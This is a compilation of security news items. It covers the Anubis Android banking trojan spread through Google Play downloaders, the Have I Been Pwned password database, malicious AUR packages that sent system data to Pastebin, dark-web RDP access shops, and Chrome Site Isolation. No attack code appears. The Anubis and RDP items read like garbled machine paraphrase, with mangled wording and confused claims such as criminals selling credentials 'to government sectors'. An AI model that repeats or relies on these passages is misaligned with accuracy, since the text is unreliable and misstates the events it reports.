Anubis Malware Re-Emerges Yet Again; Hackers Distributing It via Google Play Store

The Anubis banking malware arises once more with the threat actors allocating the malware on Google Play store applications keeping in mind the end goal to steal login credentials to banking apps, e-wallets, and payment cards.

Hackers are constantly known for finding better approaches to sidestep the Google play store security as well as ways to distribute the malware through Android applications that will additionally go about as the initial phase in an "infection routine" schedule that gets the BankBot Anubis mobile banking Trojans by means of C&C server.

Users as often as possible get tainted once they download and install the malevolent applications via the Google play store, despite the fact that the play store security investigates , all the applications that are transferred into Google Play, cybercriminals dependably execute the most complex and obscure strategies to evade the detection.

Researchers as of late discovered anew downloader’s in-app store that connected with Anubis banking malware. This campaign is known to contain no less than 10 malevolent downloaders masked as different applications. All the Downloader disseminated through Android applications is known to get in excess of 1,000 samples from the criminal's command-and-control (C&C) servers.

“In most Android banking Trojans, the malware launches a fake overlay screen when the user accesses a target app. The user then taps his or her account credentials into the fake overlay, which allows the malware to steal the data. BankBot Anubis streamlines this process.”

Cyber criminals transferring applications into Google play store influence it to resemble a live authentic one; they compromise the clients by controlling them to trust that they are giving an "expertise" as a service.

The researchers likewise found that these malignant play store applications that acted like the authentic ones, for the most part focus on the Turkish-speaking clients and the downloader applications in this specific crusade were intended to address Turkish clients just with a couple of various botnets and configurations.

All these applications are transferred to various categories, for example, online shopping to money related services and even an automotive app.

As indicated by an analysis by the X-Force, the adjustments in the downloader application propose that it is being kept up on a progressing premise, another sign that it is a ware offered to cybercriminals or a particular gathering that is centered on swindling particularly the Turkish mobile banking users.

Once the noxious downloader is effectively installed into the victims Android then the app brings BankBot Anubis from one of its C&C servers. The BankBot Anubis malware forces clients to concede the consent by acting like an application called "Google Protect." 

This accessibility will go about as a keylogger getting the infected user's credentials from infected users mobile.

BankBot Anubis is known to target users in numerous nations also for example, Australia, Austria, Azerbaijan, Belarus, Brazil, Canada, China, Czech Republic, France, Georgia, Germany, Hong Kong, India, Ireland, Israel, Japan Kazakhstan, Spain, Taiwan, Turkey, U.K. as well as U.S.

Database of 15.6 million hacked passwords available for download on “haveibeenpwned” Website

We always wonder if our email id or passwords have been ever hacked or breached, but we don't know how to check whether we have been a victim of cybercrime ever.

A website called 'Have I Been Pwned' help users to find out if their email id and passwords have been ever hacked or faced any kind of breach or not. The website also reveals the number of times your password or email-id has been compromised.

Over the years, the website has released different versions of the database with an increase in the number of hacked accounts and passwords. In August 2017 version, they released a database of 320 million unsafe passwords. And within six month period, the number increased to 500 million. Now, they have released the third version on July 13, the database has 15.6 million passwords which have been involved in past data breaches.

The database of passwords released by the website is considered unsafe and non-reliable as they have once been used in past for data breaches and could be reused again. If your password appears on the list, change it as soon as possible.

According to the website, there is a different search feature for both pwned email-id and pwned password, "When email addresses from a data breach are loaded into the site, no corresponding passwords are loaded with them. Separately to the pwned address search feature, the Pwned Passwords service allows you to check if an individual password has previously been seen in a data breach. No password is stored next to any personally identifiable data (such as an email address) and every freely available password is SHA-1 hashed."

The entire database of insecure passwords is freely available for download on the website in two different links, one is  “torrent” link and another one is  “Cloudflare” link, both of them are stored in SHA-1 hash.

To check whether your email id has been pwned or not, just visit this website and type your email-id. The interesting fact lay underneath the search bar, it shows how many times your email id has been pwned on breached sites and number of pastes. It also lists the breaches you were pwned in and the year of breaches.

To check whether your password has been pwned or not, just visit this website  and type your password. Underneath the search bar, you will find out how many times your password has been used in data breaches. On this website also you can download the entire database of insecure passwords.

Malware found in Arch Linux AUR Repository

Malware has been discovered in at least three Arch Linux packages available on AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages. The malicious code was immediately removed when the AUR team intervened. The incident occurred because the AUR team allow users to contribute to repositories that have been abandoned by their original authors.

The repository has user-submitted packages, and that is how the malware was released in the repository. A user named “xeactor” took over an ‘orphaned’ package on Saturday going by the name of “acroread” which functions as a PDF viewer and added a malicious code.

As per Git commit, “Xeactor” added a code that would download a script named “~x” from a lightweight package that allows users to share tiny pieces of text files, which in turn would execute another file named “~u”. The software meddles with “systemd” and reconfigure it. This script would run every 360 seconds.

The purpose of the second file (~u) was to collect data about each infected system including date, time, machine’s ID, package manager details, CPU information and outputs of “uname-a” and “systemctl list-units” commands and post these details inside a new Pastebin file, using the attacker's custom Pastebin API key.

The AUR team have also said they have found similar code in other packages:

▬ acroread 9.5.5-8

▬ balz 1.20-3

▬ minergate 8.1-2

The malicious code changes were reversed and xeactor’s accounts were suspended. The AUR packages are user-submitted packages to the Arch Linux Repo. There are a lot of cases this year where most of the code of the operating system has been affected by some sort of malware.

No other malicious actions were observed, meaning the acroread package wasn't harming users' systems, but merely collecting data in preparation for... something else.

Even though it does not pose any serious threat to the infected computers, it is anticipated that “xeactor” could launch another malware as any self-update mechanism was not included.

Criminals selling login credential for $10 to government sectors

Top cyber experts claimed to have traced out a gang of criminals running a den of dark web market where sensational login credentials are for sale suggesting a huge threat for the infosec community on the planet.

 During the pathbreaking research, the cyber security experts at McAfee discovered that these cyber criminals, of late, have started selling crucial data and information to many establishments including the premier government sectors making $10 within a brief period of time.

 The hackers are believed to have got access to these testimonials from government and private bodies where a strong password does not matter in the use of the Microsoft-owned remote desktop protocol which keeps providing more breakthrough for the research experts to widen the area of studies.

 The experts have confirmed a steep rise in the use of RDP by the cyber criminals since they find it easy to cover up their activities even as the system enables the users to have an access to another set of remote device.

 What makes the facts more stunning is that the hackers sold some vital systems of automated security owned by one of the top airports and the deal in the dark web market fetched them around $10 which needs further investigation to know the modus operandi.

 More and more startling revelations are surfacing on the dark web market and the RDP shops connected herewith.

The shops in question, are in the selling spree of numerous hacked systems which include Window 10, WindowsXP and what not. What is more disturbing is that many government and renowned private bodies keep procuring RDP access.

These are basically required in the medical and healthcare sectors which are well connected to these RDP shops. These shops are full of credit card, data cards and social security access for sale much to the benefit of the attackers who can have an easy access to the admin system.

They keep doing malicious activities without running any risk. They are often let off from the crime.
The researchers are of the view that these schemes of things will not die down so long as the fragile RDPs are allowed to stay on. Need of the hour, they say, is a system administration well connected with remotely accessing mechanism.

Google Chrome to get revamped soon

The world's most used internet browser Google Chrome is being redesigned to make it more fast and secure.

Google has announced this week that they have now coded robust security technologies to safeguard against the Spectre vulnerabilities that came in limelight by their own researchers at the beginning of 2018.

Chrome 67 has a Site Isolation feature which is enabled by default for all  Chrome users, but the drawback is that this feature will increase the memory usage and it will be difficult for users using devices with 4GB RAM or less.

However, the company has promised that they will work on reducing the impact of Site Isolation technology. "Our team continues to work hard to optimize this behavior to keep Chrome both fast and secure," Reis added.

According to the company, they have enabled Isolation technology for 99% of Chrome users on Windows, Mac, Linux, and Chrome OS. Meanwhile, for remaining users, it was not done to  "monitor and improve performance".

Now, it will interesting to note the reaction of users after Chrome 68 will be launched later this month. Users will be able to check whether Site Isolation is turned or not typing chrome://process-internals , but this does not work for Chrome 67.

"We're also working on additional security checks in the browser process, which will let Site Isolation mitigate not just Spectre attacks but also attacks from fully compromised renderer processes," Reis writes in his blog. "Stay tuned for an update about this enforcement."